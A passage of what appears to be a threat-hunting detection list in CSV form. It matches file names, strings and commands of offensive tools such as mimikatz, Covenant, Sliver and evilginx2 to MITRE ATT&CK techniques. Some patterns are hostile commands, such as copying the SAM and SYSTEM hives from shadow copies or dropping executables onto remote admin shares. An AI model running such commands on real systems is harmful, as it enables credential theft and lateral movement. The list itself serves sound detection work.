T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-ms.exe*",".{0,1000}Cooolis\-ms\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-msf*",".{0,1000}Cooolis\-msf.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-msX64.zip*",".{0,1000}Cooolis\-msX64\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-msX86.zip*",".{0,1000}Cooolis\-msX86\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-Reflective*",".{0,1000}Cooolis\-Reflective.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-Shellcode*",".{0,1000}Cooolis\-Shellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-String.*",".{0,1000}Cooolis\-String\..{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*CooolisVirtualAlloc*",".{0,1000}CooolisVirtualAlloc.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*copy *.exe \\*\c$\Windows\foxprow.exe*",".{0,1000}copy\s.{0,1000}\.exe\s\\\\.{0,1000}\\c\$\\Windows\\foxprow\.exe.{0,1000}","offensive_tool_keyword","copy","DCOM Lateral Movement technique leveraging Excel and ActivateMicrosoftApp works.","T1021.003 - T1566.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://x.com/ACEResponder/status/1720906842631549377","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*copy *\legit.sys *Windows\System32\Drivers\*.sys*",".{0,1000}copy\s.{0,1000}\\legit\.sys\s.{0,1000}Windows\\System32\\Drivers\\.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*copy *PROCEXP.sys*C:\Windows\System32\WindowsPowershell\*",".{0,1000}copy\s.{0,1000}PROCEXP\.sys.{0,1000}C\:\\Windows\\System32\\WindowsPowershell\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\*",".{0,1000}copy\s\\.{0,1000}\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam\sC\:\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\*",".{0,1000}copy\s\\.{0,1000}\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system\sC\:\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*copy Tsutsuji_x64.dll %appdata%*Local\Microsoft\WindowsApps\BluetoothDiagnosticUtil.dll*",".{0,1000}copy\sTsutsuji_x64\.dll\s\%appdata\%.{0,1000}Local\\Microsoft\\WindowsApps\\BluetoothDiagnosticUtil\.dll.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*CopyAndPasteEnum.bat*",".{0,1000}CopyAndPasteEnum\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*CopyAndPasteFileDownloader.bat*",".{0,1000}CopyAndPasteFileDownloader\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*Copy-Item -Path * -Destination \\$IP\transfer*",".{0,1000}Copy\-Item\s\-Path\s.{0,1000}\s\-Destination\s\\\\\$IP\\transfer.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*",".{0,1000}Copyright\s\(c\)\s2007\s\-\s2021\sgentilkiwi\s\(Benjamin\sDELPY\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Copyright (c) 2023 whoamianony.top*",".{0,1000}Copyright\s\(c\)\s2023\swhoamianony\.top.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*cordyceps.exe*",".{0,1000}cordyceps\.exe.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*Cordyceps-main.zip*",".{0,1000}Cordyceps\-main\.zip.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*core/handler/reverse*",".{0,1000}core\/handler\/reverse.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*core/http_proxy.go*",".{0,1000}core\/http_proxy\.go.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","False positives expected","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*core/sprayers/lync.py*",".{0,1000}core\/sprayers\/lync\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*core/teamserver/stagers/*",".{0,1000}core\/teamserver\/stagers\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*coreImplantFlags binds all flags common to all sliver implant types*",".{0,1000}coreImplantFlags\sbinds\sall\sflags\scommon\sto\sall\ssliver\simplant\stypes.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*CoreSecurity/impacket/*",".{0,1000}CoreSecurity\/impacket\/.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*corrupt data that was marshalled by Ndr64ConformantVaryingArrayMarshall*",".{0,1000}corrupt\sdata\sthat\swas\smarshalled\sby\sNdr64ConformantVaryingArrayMarshall.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*corscanner -i urls.txt -t 100*",".{0,1000}corscanner\s\-i\surls\.txt\s\-t\s100.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Could not parse .dmp file with pypykatz*",".{0,1000}Could\snot\sparse\s\.dmp\sfile\swith\spypykatz.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Could not spoof binary: *",".{0,1000}Could\snot\sspoof\sbinary\:\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*Could not write NTLM Hashes to the specified JTR_Dump_Path *",".{0,1000}Could\snot\swrite\sNTLM\sHashes\sto\sthe\sspecified\sJTR_Dump_Path\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*Could not write NTLM Hashes to the specified JTR_Dump_Path*",".{0,1000}Could\snot\swrite\sNTLM\sHashes\sto\sthe\sspecified\sJTR_Dump_Path.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*Couldn't clone GPO {} (maybe it does not exist?*",".{0,1000}Couldn\'t\sclone\sGPO\s\{\}\s\(maybe\sit\sdoes\snot\sexist\?.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*Covenant.API*",".{0,1000}Covenant\.API.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant.csproj*",".{0,1000}Covenant\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant.exe*",".{0,1000}Covenant\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant.Models*",".{0,1000}Covenant\.Models.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant.sln*",".{0,1000}Covenant\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant/Covenant*",".{0,1000}Covenant\/Covenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant/wwwroot*",".{0,1000}Covenant\/wwwroot.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantAPI.*",".{0,1000}CovenantAPI\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 